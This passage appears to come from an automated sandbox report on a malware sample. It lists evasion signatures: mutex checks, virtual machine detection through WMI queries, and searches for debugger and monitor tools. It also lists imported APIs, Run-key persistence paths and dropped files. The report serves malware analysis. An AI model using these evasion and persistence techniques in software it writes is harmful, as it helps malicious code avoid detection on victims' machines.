              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking mutex)
              Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_10-1446
              Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_10-1162
              Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-1146
              Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_3-1369
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-1458
              Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_9-1145
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_7-1439
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-1198
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_7-1195
              Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_9-1456
              Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCESSHACKER.EXE
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCMON.EXE
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: X64DBG.EXE
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: AUTORUNS.EXE
              Source: uFVgJVXaEU.exeBinary or memory string: GETTHREADIDKERNEL32NTDLLISWOW64PROCESSKERNEL32ZEROX64DIAMOTRIXBOTMADE IN ALGERIA <3SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDERGQGWZD.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: IDAQ.EXE
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeMemory allocated: 2650000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeMemory allocated: 2900000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeMemory allocated: 2650000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA8400 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,5_2_0DFA8400
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 423Jump to behavior
              Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 846Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3732Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3145Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1498Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1306Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 799Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 796Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWindow / User API: threadDelayed 2831Jump to behavior
              Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_5-104490
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\python38.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\_hashlib.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\libcrypto-1_1.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\_ctypes.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\unicodedata.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\_socket.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\select.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\_bz2.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\_lzma.pydJump to dropped file
              Source: C:\Windows\explorer.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_5-103959
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-1184
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_12-17693
              Source: C:\Windows\System32\audiodg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_9-1134
              Source: C:\Windows\System32\msiexec.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-1151
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-1187
              Source: C:\Windows\System32\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-1135
              Source: C:\Windows\explorer.exeAPI coverage: 6.7 %
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeAPI coverage: 1.8 %
              Source: C:\Windows\System32\audiodg.exe TID: 7664Thread sleep time: -50000s >= -30000sJump to behavior
              Source: C:\Windows\System32\audiodg.exe TID: 7664Thread sleep count: 281 > 30Jump to behavior
              Source: C:\Windows\System32\audiodg.exe TID: 7664Thread sleep time: -14050000s >= -30000sJump to behavior
              Source: C:\Windows\System32\audiodg.exe TID: 7704Thread sleep count: 71 > 30Jump to behavior
              Source: C:\Windows\System32\audiodg.exe TID: 7704Thread sleep time: -191700s >= -30000sJump to behavior
              Source: C:\Windows\System32\audiodg.exe TID: 7720Thread sleep count: 316 > 30Jump to behavior
              Source: C:\Windows\System32\audiodg.exe TID: 7720Thread sleep time: -1896000s >= -30000sJump to behavior
              Source: C:\Windows\System32\audiodg.exe TID: 7664Thread sleep time: -50000s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7672Thread sleep count: 423 > 30Jump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7672Thread sleep time: -21150000s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7792Thread sleep count: 846 > 30Jump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7792Thread sleep time: -5076000s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7672Thread sleep time: -50000s >= -30000sJump to behavior
              Source: C:\Windows\System32\msiexec.exe TID: 7680Thread sleep time: -50000s >= -30000sJump to behavior
              Source: C:\Windows\System32\msiexec.exe TID: 7680Thread sleep count: 380 > 30Jump to behavior
              Source: C:\Windows\System32\msiexec.exe TID: 7680Thread sleep time: -19000000s >= -30000sJump to behavior
              Source: C:\Windows\System32\msiexec.exe TID: 7716Thread sleep count: 53 > 30Jump to behavior
              Source: C:\Windows\System32\msiexec.exe TID: 7716Thread sleep time: -143100s >= -30000sJump to behavior
              Source: C:\Windows\System32\msiexec.exe TID: 7724Thread sleep count: 368 > 30Jump to behavior
              Source: C:\Windows\System32\msiexec.exe TID: 7724Thread sleep time: -2208000s >= -30000sJump to behavior
              Source: C:\Windows\System32\msiexec.exe TID: 7680Thread sleep time: -50000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 7736Thread sleep time: -3545400s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 7748Thread sleep time: -2987750s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 7788Thread sleep time: -68400s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 7732Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 7736Thread sleep time: -1423100s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 7748Thread sleep time: -1240700s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe TID: 6052Thread sleep time: -8301034833169293s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe TID: 7880Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
              Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
              Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24F79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,12_2_00007FF7F24F79B0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24F85A0 FindFirstFileExW,FindClose,12_2_00007FF7F24F85A0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2510B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_00007FF7F2510B84
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24F85A0 FindFirstFileExW,FindClose,13_2_00007FF7F24F85A0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2510B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_00007FF7F2510B84
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24F79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_00007FF7F24F79B0
